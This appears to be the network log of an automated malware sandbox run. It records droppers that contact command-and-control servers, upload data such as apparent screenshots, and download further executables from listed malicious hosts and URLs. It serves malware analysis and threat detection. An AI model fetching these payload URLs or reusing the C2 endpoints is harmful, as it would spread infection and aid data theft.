                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://185.215.113.55/t5BnOoke2/index.php
                                                                                                                                                                                        nrbux.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        185.215.113.55:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST /t5BnOoke2/index.php HTTP/1.1
                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                        Host: 185.215.113.55
                                                                                                                                                                                        Content-Length: 84
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 200 OK
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:37:42 GMT
                                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                        Content-Length: 6
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://87.251.71.195:82/
                                                                                                                                                                                        arnatic_7.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        87.251.71.195:82
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST / HTTP/1.1
                                                                                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                                                                                        Host: 87.251.71.195:82
                                                                                                                                                                                        Content-Length: 137
                                                                                                                                                                                        Expect: 100-continue
                                                                                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://87.251.71.195:82/
                                                                                                                                                                                        arnatic_7.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        87.251.71.195:82
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST / HTTP/1.1
                                                                                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                                                                                        Host: 87.251.71.195:82
                                                                                                                                                                                        Content-Length: 137
                                                                                                                                                                                        Expect: 100-continue
                                                                                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://185.215.113.55/t5BnOoke2/index.php
                                                                                                                                                                                        nrbux.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        185.215.113.55:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST /t5BnOoke2/index.php HTTP/1.1
                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                        Host: 185.215.113.55
                                                                                                                                                                                        Content-Length: 84
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 200 OK
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:38:42 GMT
                                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                        Content-Length: 6
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://185.215.113.55/t5BnOoke2/index.php
                                                                                                                                                                                        nrbux.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        185.215.113.55:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST /t5BnOoke2/index.php HTTP/1.1
                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                        Host: 185.215.113.55
                                                                                                                                                                                        Content-Length: 84
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 200 OK
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:39:43 GMT
                                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                        Content-Length: 6
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://185.215.113.55/t5BnOoke2/index.php?scr=1
                                                                                                                                                                                        nrbux.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        185.215.113.55:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST /t5BnOoke2/index.php?scr=1 HTTP/1.1
                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=----a66c74a3a92acc11cfdd08dd2aaf5e27
                                                                                                                                                                                        Host: 185.215.113.55
                                                                                                                                                                                        Content-Length: 89467
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://87.251.71.195:82/
                                                                                                                                                                                        arnatic_7.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        87.251.71.195:82
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST / HTTP/1.1
                                                                                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                                                                                        Host: 87.251.71.195:82
                                                                                                                                                                                        Content-Length: 137
                                                                                                                                                                                        Expect: 100-continue
                                                                                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://185.215.113.55/t5BnOoke2/index.php
                                                                                                                                                                                        nrbux.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        185.215.113.55:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST /t5BnOoke2/index.php HTTP/1.1
                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                        Host: 185.215.113.55
                                                                                                                                                                                        Content-Length: 84
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 200 OK
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:40:44 GMT
                                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                        Content-Length: 6
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://87.251.71.195:82/
                                                                                                                                                                                        arnatic_7.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        87.251.71.195:82
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST / HTTP/1.1
                                                                                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                                                                                        Host: 87.251.71.195:82
                                                                                                                                                                                        Content-Length: 137
                                                                                                                                                                                        Expect: 100-continue
                                                                                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://87.251.71.195:82/
                                                                                                                                                                                        arnatic_7.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        87.251.71.195:82
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST / HTTP/1.1
                                                                                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                                                                                        Host: 87.251.71.195:82
                                                                                                                                                                                        Content-Length: 137
                                                                                                                                                                                        Expect: 100-continue
                                                                                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://87.251.71.195:82/
                                                                                                                                                                                        arnatic_7.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        87.251.71.195:82
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST / HTTP/1.1
                                                                                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                                                                                        Host: 87.251.71.195:82
                                                                                                                                                                                        Content-Length: 137
                                                                                                                                                                                        Expect: 100-continue
                                                                                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://185.215.113.55/t5BnOoke2/index.php
                                                                                                                                                                                        nrbux.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        185.215.113.55:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST /t5BnOoke2/index.php HTTP/1.1
                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                        Host: 185.215.113.55
                                                                                                                                                                                        Content-Length: 84
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 200 OK
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:41:45 GMT
                                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                        Content-Length: 6
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://185.215.113.55/t5BnOoke2/index.php
                                                                                                                                                                                        nrbux.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        185.215.113.55:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST /t5BnOoke2/index.php HTTP/1.1
                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                        Host: 185.215.113.55
                                                                                                                                                                                        Content-Length: 84
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 200 OK
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:42:46 GMT
                                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                        Content-Length: 6
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://185.215.113.55/t5BnOoke2/index.php?scr=1
                                                                                                                                                                                        nrbux.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        185.215.113.55:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST /t5BnOoke2/index.php?scr=1 HTTP/1.1
                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=----004x�f�1��f��f89254dee9ea36ffa3d24717b0adfb362ae6
                                                                                                                                                                                        Host: 185.215.113.55
                                                                                                                                                                                        Content-Length: 89500
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://87.251.71.195:82/
                                                                                                                                                                                        arnatic_7.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        87.251.71.195:82
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST / HTTP/1.1
                                                                                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                                                                                        Host: 87.251.71.195:82
                                                                                                                                                                                        Content-Length: 137
                                                                                                                                                                                        Expect: 100-continue
                                                                                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://185.215.113.55/t5BnOoke2/index.php
                                                                                                                                                                                        nrbux.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        185.215.113.55:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST /t5BnOoke2/index.php HTTP/1.1
                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                        Host: 185.215.113.55
                                                                                                                                                                                        Content-Length: 84
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 200 OK
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:43:46 GMT
                                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                        Content-Length: 6
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                      • 104.21.12.59:80
                                                                                                                                                                                        http://motiwa.xyz/addInstall.php?key=125478824515ADNxu2ccbwe&ip=&oid=4&oname[]=25June325AM&oname[]=7&oname[]=1&oname[]=2&oname[]=3&oname[]=4&oname[]=5&oname[]=6&cnt=7
                                                                                                                                                                                        http
                                                                                                                                                                                        setup_install.exe
                                                                                                                                                                                        657 B
                                                                                                                                                                                        13.2kB
                                                                                                                                                                                        10
                                                                                                                                                                                        14

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        GET http://motiwa.xyz/addInstall.php?key=125478824515ADNxu2ccbwe&ip=&oid=4&oname[]=25June325AM&oname[]=7&oname[]=1&oname[]=2&oname[]=3&oname[]=4&oname[]=5&oname[]=6&cnt=7

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        403
                                                                                                                                                                                      • 208.95.112.1:80
                                                                                                                                                                                        http://ip-api.com/json/
                                                                                                                                                                                        http
                                                                                                                                                                                        arnatic_4.exe
                                                                                                                                                                                        958 B
                                                                                                                                                                                        859 B
                                                                                                                                                                                        10
                                                                                                                                                                                        9

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        GET http://ip-api.com/json/

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        200
                                                                                                                                                                                      • 136.144.41.133:80
                                                                                                                                                                                        http://136.144.41.133/server.txt
                                                                                                                                                                                        http
                                                                                                                                                                                        arnatic_6.exe
                                                                                                                                                                                        479 B
                                                                                                                                                                                        172 B
                                                                                                                                                                                        6
                                                                                                                                                                                        4

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        GET http://136.144.41.133/server.txt
                                                                                                                                                                                      • 172.67.201.250:443
                                                                                                                                                                                        https://videoconvert-download38.xyz/?user=newpb1_6
                                                                                                                                                                                        tls, http
                                                                                                                                                                                        arnatic_5.exe
                                                                                                                                                                                        16.7kB
                                                                                                                                                                                        781.2kB
                                                                                                                                                                                        344
                                                                                                                                                                                        661

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        GET https://videoconvert-download38.xyz/?user=newpb1_1

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        200

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        GET https://videoconvert-download38.xyz/?user=newpb1_2

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        200

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        GET https://videoconvert-download38.xyz/?user=newpb1_3

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        200

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        GET https://videoconvert-download38.xyz/?user=newpb1_4

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        200

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        GET https://videoconvert-download38.xyz/?user=newpb1_5

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        200

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        GET https://videoconvert-download38.xyz/?user=newpb1_6

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        200
                                                                                                                                                                                      • 157.240.240.35:443
                                                                                                                                                                                        https://www.facebook.com/
                                                                                                                                                                                        tls, http
                                                                                                                                                                                        arnatic_4.exe
                                                                                                                                                                                        10.9kB
                                                                                                                                                                                        450.3kB
                                                                                                                                                                                        202
                                                                                                                                                                                        359

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        GET https://www.facebook.com/

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        200

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        GET https://www.facebook.com/

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        200
                                                                                                                                                                                      • 172.67.182.129:443
                                                                                                                                                                                        https://iphonemoney.xyz/
                                                                                                                                                                                        tls, http
                                                                                                                                                                                        7398983.exe
                                                                                                                                                                                        43.5kB
                                                                                                                                                                                        2.2MB
                                                                                                                                                                                        869
                                                                                                                                                                                        1711

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        GET https://iphonemoney.xyz/api.php?getusers

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        200

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        GET https://iphonemoney.xyz/api.php

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        200

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST https://iphonemoney.xyz/

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        200
                                                                                                                                                                                      • 87.251.71.195:82
                                                                                                                                                                                        http://87.251.71.195:82/
                                                                                                                                                                                        http
                                                                                                                                                                                        arnatic_7.exe
                                                                                                                                                                                        874 B
                                                                                                                                                                                        452 B
                                                                                                                                                                                        11
                                                                                                                                                                                        11

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://87.251.71.195:82/
                                                                                                                                                                                      • 74.114.154.22:443
                                                                                                                                                                                        https://sergeevih43.tumblr.com/
                                                                                                                                                                                        tls, http
                                                                                                                                                                                        arnatic_1.exe
                                                                                                                                                                                        1.0kB
                                                                                                                                                                                        5.9kB
                                                                                                                                                                                        15
                                                                                                                                                                                        13

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        GET https://sergeevih43.tumblr.com/
                                                                                                                                                                                      • 208.95.112.1:80
                                                                                                                                                                                        http://ip-api.com/json/?fields=8198
                                                                                                                                                                                        http
                                                                                                                                                                                        SystemNetworkService
                                                                                                                                                                                        844 B
                                                                                                                                                                                        686 B
                                                                                                                                                                                        12
                                                                                                                                                                                        11

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        GET http://ip-api.com/json/?fields=8198

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        200
                                                                                                                                                                                      • 88.218.92.148:80
                                                                                                                                                                                        http://uyg5wye.2ihsfa.com/api/?sid=290613&key=d7f614e3c3e5f3d02ab84fc794796c5b
                                                                                                                                                                                        http
                                                                                                                                                                                        arnatic_4.exe
                                                                                                                                                                                        1.3kB
                                                                                                                                                                                        943 B
                                                                                                                                                                                        10
                                                                                                                                                                                        10

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        GET http://uyg5wye.2ihsfa.com/api/fbtime

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        200

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://uyg5wye.2ihsfa.com/api/?sid=290613&key=d7f614e3c3e5f3d02ab84fc794796c5b

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        200
                                                                                                                                                                                      • 104.21.21.221:80
                                                                                                                                                                                        http://iw.gamegame.info/report7.4.php
                                                                                                                                                                                        http
                                                                                                                                                                                        SystemNetworkService
                                                                                                                                                                                        1.2kB
                                                                                                                                                                                        13.8kB
                                                                                                                                                                                        14
                                                                                                                                                                                        13

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://iw.gamegame.info/report7.4.php

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        403
                                                                                                                                                                                      • 104.21.54.72:443
                                                                                                                                                                                        https://download-serv-235442.xyz/
                                                                                                                                                                                        tls, http
                                                                                                                                                                                        4460127.exe
                                                                                                                                                                                        5.1kB
                                                                                                                                                                                        5.2kB
                                                                                                                                                                                        14
                                                                                                                                                                                        16

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        GET https://download-serv-235442.xyz/api.php

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        200

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST https://download-serv-235442.xyz/

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        200
                                                                                                                                                                                      • 88.99.66.31:443
                                                                                                                                                                                        https://iplogger.org/1SPHi7
                                                                                                                                                                                        tls, http
                                                                                                                                                                                        arnatic_5.exe
                                                                                                                                                                                        812 B
                                                                                                                                                                                        6.3kB
                                                                                                                                                                                        9
                                                                                                                                                                                        10

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        GET https://iplogger.org/1SPHi7

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        200
                                                                                                                                                                                      • 104.21.46.30:443
                                                                                                                                                                                        https://pcfixmy-download-13.xyz/
                                                                                                                                                                                        tls, http
                                                                                                                                                                                        3466090.exe
                                                                                                                                                                                        46.1kB
                                                                                                                                                                                        2.2MB
                                                                                                                                                                                        926
                                                                                                                                                                                        1799

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        GET https://pcfixmy-download-13.xyz/api.php?getusers

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        200

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        GET https://pcfixmy-download-13.xyz/api.php

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        200

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST https://pcfixmy-download-13.xyz/

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        200
                                                                                                                                                                                      • 88.99.66.31:443
                                                                                                                                                                                        https://iplogger.org/1vpFz7
                                                                                                                                                                                        tls, http
                                                                                                                                                                                        arnatic_5.exe
                                                                                                                                                                                        548 B
                                                                                                                                                                                        1.2kB
                                                                                                                                                                                        5
                                                                                                                                                                                        5

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        GET https://iplogger.org/1vpFz7

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        200
                                                                                                                                                                                      • 104.21.21.221:80
                                                                                                                                                                                        http://iw.gamegame.info/report7.4.php
                                                                                                                                                                                        http
                                                                                                                                                                                        SystemNetworkService
                                                                                                                                                                                        1.2kB
                                                                                                                                                                                        13.8kB
                                                                                                                                                                                        14
                                                                                                                                                                                        13

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://iw.gamegame.info/report7.4.php

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        403
                                                                                                                                                                                      • 136.144.41.201:80
                                                                                                                                                                                        http://136.144.41.201/server.txt
                                                                                                                                                                                        http
                                                                                                                                                                                        arnatic_6.exe
                                                                                                                                                                                        663 B
                                                                                                                                                                                        674 B
                                                                                                                                                                                        10
                                                                                                                                                                                        9

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        GET http://136.144.41.201/server.txt

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        200
                                                                                                                                                                                      • 34.117.59.81:443
                                                                                                                                                                                        https://ipinfo.io/widget
                                                                                                                                                                                        tls, http
                                                                                                                                                                                        arnatic_6.exe
                                                                                                                                                                                        1.2kB
                                                                                                                                                                                        6.7kB
                                                                                                                                                                                        14
                                                                                                                                                                                        16

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        GET https://ipinfo.io/widget

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        200
                                                                                                                                                                                      • 79.174.12.174:80
                                                                                                                                                                                        http://79.174.12.174/base/api/getData.php
                                                                                                                                                                                        http
                                                                                                                                                                                        arnatic_6.exe
                                                                                                                                                                                        3.6kB
                                                                                                                                                                                        6.0kB
                                                                                                                                                                                        25
                                                                                                                                                                                        26

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://79.174.12.174/base/api/getData.php

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        200

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://79.174.12.174/base/api/getData.php

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        200

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://79.174.12.174/base/api/getData.php

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        200

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://79.174.12.174/base/api/getData.php

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        200

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://79.174.12.174/base/api/getData.php

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        200

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://79.174.12.174/base/api/getData.php

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        200
                                                                                                                                                                                      • 136.144.41.201:80
                                                                                                                                                                                        http://136.144.41.201/WW/file4.exe
                                                                                                                                                                                        http
                                                                                                                                                                                        arnatic_6.exe
                                                                                                                                                                                        65.0kB
                                                                                                                                                                                        1.6MB
                                                                                                                                                                                        1400
                                                                                                                                                                                        1398

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        HEAD http://136.144.41.201/WW/file2.exe

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        200

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        HEAD http://136.144.41.201/WW/file6.exe

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        200

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        GET http://136.144.41.201/WW/file4.exe

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        200
                                                                                                                                                                                      • 136.144.41.201:80
                                                                                                                                                                                        http://136.144.41.201/WW/file3.exe
                                                                                                                                                                                        http
                                                                                                                                                                                        arnatic_6.exe
                                                                                                                                                                                        36.2kB
                                                                                                                                                                                        867.1kB
                                                                                                                                                                                        769
                                                                                                                                                                                        769

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        HEAD http://136.144.41.201/WW/file4.exe

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        200

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        HEAD http://136.144.41.201/WW/file3.exe

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        200

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        GET http://136.144.41.201/WW/file2.exe

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        200

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        GET http://136.144.41.201/WW/file3.exe
                                                                                                                                                                                      • 185.20.227.194:80
                                                                                                                                                                                        http://185.20.227.194/install.exe
                                                                                                                                                                                        http
                                                                                                                                                                                        arnatic_6.exe
                                                                                                                                                                                        390 B
                                                                                                                                                                                        92 B
                                                                                                                                                                                        4
                                                                                                                                                                                        2

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        HEAD http://185.20.227.194/install.exe
                                                                                                                                                                                      • 89.221.213.3:80
                                                                                                                                                                                        http://www.quickfastfuriousloaded.com/campaign1/SunLabsPlayer.exe
                                                                                                                                                                                        http
                                                                                                                                                                                        arnatic_6.exe
                                                                                                                                                                                        422 B
                                                                                                                                                                                        92 B
                                                                                                                                                                                        4
                                                                                                                                                                                        2

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        HEAD http://www.quickfastfuriousloaded.com/campaign1/SunLabsPlayer.exe
                                                                                                                                                                                      • 104.21.65.45:80
                                                                                                                                                                                        jom.diregame.live
                                                                                                                                                                                        tls
                                                                                                                                                                                        arnatic_6.exe
                                                                                                                                                                                        408 B
                                                                                                                                                                                        488 B
                                                                                                                                                                                        5
                                                                                                                                                                                        4
                                                                                                                                                                                      • 172.67.202.130:80
                                                                                                                                                                                        http://fikerty.info/app.exe
                                                                                                                                                                                        http
                                                                                                                                                                                        arnatic_6.exe
                                                                                                                                                                                        991 B
                                                                                                                                                                                        1.9kB
                                                                                                                                                                                        13
                                                                                                                                                                                        11

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        HEAD http://fikerty.info/app.exe

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        302

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        GET http://fikerty.info/app.exe

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        302
                                                                                                                                                                                      • 162.159.135.233:80
                                                                                                                                                                                        cdn.discordapp.com
                                                                                                                                                                                        tls
                                                                                                                                                                                        arnatic_6.exe
                                                                                                                                                                                        409 B
                                                                                                                                                                                        488 B
                                                                                                                                                                                        5
                                                                                                                                                                                        4
                                                                                                                                                                                      • 162.159.135.233:80
                                                                                                                                                                                        cdn.discordapp.com
                                                                                                                                                                                        tls
                                                                                                                                                                                        arnatic_6.exe
                                                                                                                                                                                        409 B
                                                                                                                                                                                        488 B
                                                                                                                                                                                        5
                                                                                                                                                                                        4
                                                                                                                                                                                      • 176.99.131.168:80
                                                                                                                                                                                        http://name-usa.info/app/files/dc/id27315003/compan.exe
                                                                                                                                                                                        http
                                                                                                                                                                                        arnatic_6.exe
                                                                                                                                                                                        45.7kB
                                                                                                                                                                                        1.2MB
                                                                                                                                                                                        984
                                                                                                                                                                                        982

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        HEAD http://name-usa.info/app/files/dc/id27315003/compan.exe

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        200

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        GET http://name-usa.info/app/files/dc/id27315003/compan.exe

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        200
                                                                                                                                                                                      • 104.21.21.221:80
                                                                                                                                                                                        http://iw.gamegame.info/report7.4.php
                                                                                                                                                                                        http
                                                                                                                                                                                        SystemNetworkService
                                                                                                                                                                                        1.2kB
                                                                                                                                                                                        13.8kB
                                                                                                                                                                                        14
                                                                                                                                                                                        13

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://iw.gamegame.info/report7.4.php

                                                                                                                                                                                        HTTP Response

